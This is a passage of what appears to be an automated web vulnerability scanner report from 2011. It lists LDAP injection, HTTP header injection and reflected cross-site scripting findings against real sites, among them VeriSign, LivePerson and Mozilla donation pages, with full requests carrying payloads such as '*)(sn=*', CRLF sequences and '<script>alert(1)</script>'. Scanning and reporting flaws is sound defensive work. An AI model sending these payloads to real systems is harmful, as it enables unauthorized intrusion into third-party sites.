HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:35 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:35 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:36:35 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=*)!(sn=* HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:36 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:36 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
1.12. http://sales.liveperson.net/hc/71097838/ [timeout parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sales.liveperson.net
Path:
/hc/71097838/
Issue detail
The timeout parameter appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the timeout parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=*)(sn=* &channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:08 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603887:-1:1315604093:-1:-1; expires=Sat, 08-Sep-2012 21:36:08 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 94 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":""}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=*)!(sn=* &channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:10 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 94 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":""}});
2. HTTP header injection
previous
next
There are 5 instances of this issue:
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response. Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. https://idprotect.verisign.com/toolbar/activate.v [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/activate.v
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload b75a9%0d%0a75e798ebedb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /toolbar/b75a9%0d%0a75e798ebedb HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:54 GMT Location: https://idprotect.verisign.com/toolbar/b75a9 75e798ebedb .v Content-Length: 0 Connection: close Content-Type: text/plain
2.2. https://idprotect.verisign.com/toolbar/download.v [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/download.v
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload e39d2%0d%0acc51e9a9020 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /toolbar/e39d2%0d%0acc51e9a9020 HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/home.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:54 GMT Location: https://idprotect.verisign.com/toolbar/e39d2 cc51e9a9020 .v Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/plain
2.3. https://idprotect.verisign.com/toolbar/downloadIE.v [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/downloadIE.v
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload b8c36%0d%0ab68ecacc3e6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /toolbar/b8c36%0d%0ab68ecacc3e6 HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/install.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:48:19 GMT Location: https://idprotect.verisign.com/toolbar/b8c36 b68ecacc3e6 .v Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/plain
2.4. https://idprotect.verisign.com/toolbar/home.v [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/home.v
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 2c8db%0d%0a9a17d95f3a9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /toolbar/2c8db%0d%0a9a17d95f3a9 HTTP/1.1 Host: idprotect.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:42:10 GMT Location: https://idprotect.verisign.com/toolbar/2c8db 9a17d95f3a9 .v Content-Length: 0 Connection: close Content-Type: text/plain
2.5. https://idprotect.verisign.com/toolbar/install.v [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/install.v
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 8796f%0d%0aaa90b981baa was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /toolbar/8796f%0d%0aaa90b981baa HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/download.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:55 GMT Location: https://idprotect.verisign.com/toolbar/8796f aa90b981baa .v Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/plain
3. Cross-site scripting (reflected)
previous
next
There are 35 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. https://cert.webtrust.org/ViewSeal [id parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://cert.webtrust.org
Path:
/ViewSeal
Issue detail
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload e2636<script>alert(1)</script>2536d5d1b26 was submitted in the id parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ViewSeal?id=304e2636<script>alert(1)</script>2536d5d1b26 HTTP/1.1 Host: cert.webtrust.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:35 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Connection: close Content-Type: text/html Content-Length: 2976 java.lang.NumberFormatException: For input string: "304e2636<script>alert(1)</script>2536d5d1b26 " at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48) at java.lang.Integer.parseInt(Integer.java:435) at java.lang.Integer.parseInt(Integer.java:476) at ca.cica.servlet...[SNIP]...
3.2. http://com-verisign.netmng.com/ [height parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://com-verisign.netmng.com
Path:
/
Issue detail
The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 42f25<script>alert(1)</script>04b6e822761 was submitted in the height parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?function=createPopinWindow&name=screen1&width=754&height=42f25<script>alert(1)</script>04b6e822761 &rand=0.03673732164315879&nm_input_data=%22%22 HTTP/1.1 Host: com-verisign.netmng.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN_popin=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:39 GMT Server: Apache/2.2.9 P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Wed, 07 Sep 2011 21:28:39 GMT Last-Modified: Wed, 07 Sep 2011 21:28:39 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18558 nm_Popin.arrPopinWindow['screen1'].createPopinWindow(754,42f25<script>alert(1)</script>04b6e822761 , '<form name=\"screen1\" onsubmit=\"return false;\" method=\"get\"> <input type=\"hidden\" nam...[SNIP]...
3.3. http://com-verisign.netmng.com/ [width parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://com-verisign.netmng.com
Path:
/
Issue detail
The value of the width request parameter is copied into the HTML document as plain text between tags. The payload ef64f<script>alert(1)</script>1df44e97474 was submitted in the width parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?function=createPopinWindow&name=screen1&width=754ef64f<script>alert(1)</script>1df44e97474 &height=400&rand=0.03673732164315879&nm_input_data=%22%22 HTTP/1.1 Host: com-verisign.netmng.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN_popin=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:36 GMT Server: Apache/2.2.9 P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Wed, 07 Sep 2011 21:28:36 GMT Last-Modified: Wed, 07 Sep 2011 21:28:36 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18562 nm_Popin.arrPopinWindow['screen1'].createPopinWindow(754ef64f<script>alert(1)</script>1df44e97474 , 400, '<form name=\"screen1\" onsubmit=\"return false;\" method=\"get\"> <input type=\"hidden\"...[SNIP]...
3.4. https://donate.mozilla.org/favicon.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://donate.mozilla.org
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 559c1<script>alert(1)</script>34648dd8ac9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico559c1<script>alert(1)</script>34648dd8ac9 HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:57 GMT X-Served-By: moz2 Connection: Keep-Alive Set-Cookie: X-CheckNode=true; domain=donate.mozilla.org; path=/ Content-Length: 310 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /favicon.ico559c1<script>alert(1)</script>34648dd8ac9 </p><p><a href="http://donate....[SNIP]...
3.5. https://donate.mozilla.org/favicon.ico [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://donate.mozilla.org
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 29f1f<script>alert(1)</script>971a874b532 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?29f1f<script>alert(1)</script>971a874b532 =1 HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:56 GMT X-Served-By: moz2 Connection: Keep-Alive Set-Cookie: X-CheckNode=true; domain=donate.mozilla.org; path=/ Content-Length: 313 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /favicon.ico?29f1f<script>alert(1)</script>971a874b532 =1</p><p><a href="http://dona...[SNIP]...
3.6. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://donate.mozilla.org
Path:
/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a47c6<script>alert(1)</script>68ca81f006 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page1166c%3Cscript%3Ealert(document.location)%3Ca47c6<script>alert(1)</script>68ca81f006 /script%3E98501cf3ded/contribute/openwebfund HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:57 GMT Connection: Keep-Alive Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ Content-Length: 390 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3Ca47c6<script>alert(1)</script>68ca81f006 /script%3E98501cf3ded/contribute/openwebfund</p>...[SNIP]...
3.7. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://donate.mozilla.org
Path:
/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 809c8<script>alert(1)</script>eb7bb1b1504 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded809c8<script>alert(1)</script>eb7bb1b1504 /contribute/openwebfund HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:58 GMT Connection: Keep-Alive Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ Content-Length: 391 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded809c8<script>alert(1)</script>eb7bb1b1504 /contribute/openwebfund</p>...[SNIP]...
3.8. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://donate.mozilla.org
Path:
/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund
Issue detail
